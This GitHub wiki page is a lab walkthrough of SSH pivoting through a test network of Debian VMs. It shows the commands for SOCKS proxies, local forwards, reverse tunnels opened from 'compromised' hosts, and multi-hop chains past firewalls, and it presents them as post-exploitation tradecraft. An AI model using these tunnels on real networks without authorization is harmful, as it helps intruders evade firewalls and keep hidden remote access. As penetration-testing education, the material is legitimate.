Skip to content

SSH

Jump to bottom Edit New page
int0x80 edited this page Sep 28, 2016 · 8 revisions

Overview

I have set up a small test network of three Debian VMs and my attack VM.

  1. chicken (192.168.1.244)
  2. porkchop (192.168.1.243)
  3. steak (192.168.1.184)
  4. attackVM (192.168.1.134)

The steak VM has a web server with a simple PHP page that displays the visitor's IP address.

<html>
<body>
<p>Did you say steak?</p>
<p><?php echo $_SERVER['REMOTE_ADDR']; ?></p>
</body>
</html>

Direct

Browsing with no intermediary hops.

attackVM $ curl http://steak.test.ssh/steak.php
<html>
<body>
<p>Did you say steak?</p>
<p>192.168.1.134</p>
</body>
</html>

SOCKS Proxy

Hosts involved:

  • chicken (192.168.1.244)
  • attackVM (192.168.1.134)

This is simple utilization of the -D flag in the ssh client.

attackVM $ ssh -N -D 8282 tuna@chicken.test.ssh

Configure the browser in attackVM to use a SOCKS proxy on 127.0.0.1:8282 since we selected 8282 for our SOCKS listener via -D. Browse to steak and we'll see that our IP is now 192.168.1.244 meaning we've connected through chicken.

attackVM $ curl --socks5 127.0.0.1:8282 http://steak.test.ssh/steak.php
<html>
<body>
<p>Did you say steak?</p>
<p>192.168.1.244</p>
</body>
</html>

SSH Proxy + Tunnel

Hosts involved:

  • chicken (192.168.1.244)
  • porkchop (192.168.1.243)
  • attackVM (192.168.1.134)

Now I'm going to use chicken as a staging server which has access to an "internal" server, porkchop. We'll establish an SSH connection between chicken and porkchop, then forward the SOCKS port from the initial connection and use it to browse through porkchop from our attack VM.

attackVM $ ssh tuna@chicken.test.ssh
tuna@chicken:~$ ssh -N -D 8484 -p 4444 sandwich@porkchop.test.ssh

The SSH connection is now established between chicken and porkchop. Let's forward the SOCKS port 8484 to our attack VM.

attackVM $ ssh -N -L 127.0.0.1:44444:127.0.0.1:8484 tuna@chicken.test.ssh

Here we've forwarded the SOCKS listener on port 8484 of chicken to our local port 44444. Configure the browser in attackVM to use a SOCKS proxy on 127.0.0.1:44444 since we selected 44444 for forwarding our SOCKS listener via -L. Browse to steak and we'll see that our IP is now 192.168.1.243 meaning we've connected through porkchop.

attackVM $ curl --socks5 127.0.0.1:44444 http://steak.test.ssh/steak.php
<html>
<body>
<p>Did you say steak?</p>
<p>192.168.1.243</p>
</body>
</html>

The key part here is that only the last hop is dynamic (-D). All other listeners should be static (-L).

Reverse SSH Tunnel

Hosts involved:

  • chicken (192.168.1.244)
  • steak (192.168.1.184)
  • attackVM (192.168.1.134)

In this scenario, let's assert we've got a shell on steak but we cannot connect directly from our attackVM. Instead, we'll set up a tunnel from steak to chicken; then establish a new connection from attackVM to chicken and connect locally on chicken into the tunnel to reach our shell on steak.

First set up the tunnel from steak to chicken. In this case, we have created an SSH key pair on steak and added the public key to ~chicken/.ssh/authorized_keys on chicken.

filet@steak:~$ ssh -o StrictHostKeyChecking=no -o TCPKeepAlive=yes -p 22 -N -f -R 6666:127.0.0.1:5555 tuna@chicken.test.ssh

Note that SSH is listening on port 5555 on steak, and the default 22 on chicken. Next we'll connect to chicken from attackVM then complete the connection to steak via the exposed listener.

attackVM $ ssh tuna@chicken.test.ssh
tuna@chicken:~$ ssh -p 6666 filet@localhost
filet@localhost's password: 
filet@steak:~$ hostname --fqdn
steak.test.ssh

Now we have access to our shell on steak using chicken as an intermediary hop.

SSH Tunnel: Multiple Hops

Hosts involved:

  • chicken (192.168.1.244)
  • porkchop (192.168.1.243)
  • steak (192.168.1.184)
  • attackVM (192.168.1.134)

In this scenario, we've got a shell on both porkchop and steak, but they both live behind a firewall preventing inbound SSH connections. Assert that steak can only talk to porkchop and other internal hosts, but cannot access the internet, while chicken is out on the internet. Our attackVM is behind some kind of NAT or firewall and cannot receive inbound connections.

Awful Network Diagram

Our goal is to use our shell on steak to browse the rest of the internal infrastructure.

1. From porkchop, reverse SSH tunnel to chicken with a listener on 1111. Note that SSH is listening on port 4444 on porkchop.

sandwich@porkchop:~$ ssh -o StrictHostKeyChecking=no -o TCPKeepAlive=yes -p 22 -N -f -R 1111:localhost:4444 tuna@chicken.test.ssh

2. From porkchop, ssh to steak and set up a dynamic (-D) SOCKS listener on 8585. Note that SSH is listening on port 5555 on steak.

sandwich@porkchop:~$ ssh -f -n -N -D 8585 -p 5555 filet@steak.test.ssh

3. From chicken, create a local (-L) port forward to the dynamic SOCKS listener on porkchop. Note that SSH is listening on port 4444 on porkchop.

tuna@chicken:~$ ssh -f -n -N -L 127.0.0.1:8585:127.0.0.1:8585 -p 1111 sandwich@localhost

4. From attackVM, create a local (-L) port forward to complete the connection.

attackVM $ ssh -f -n -N -L 127.0.0.1:8585:127.0.0.1:8585 tuna@chicken.test.ssh
attackVM $ curl --socks5 127.0.0.1:8585 http://steak.test.ssh/steak.php
<html>
<body>
<p>Did you say steak?</p>
<p>192.168.1.184</p>
</body>
</html>

We now have a tunnel to steak from attackVM connecting through chicken then through porkchop.

Add a custom footer
Clone this wiki locally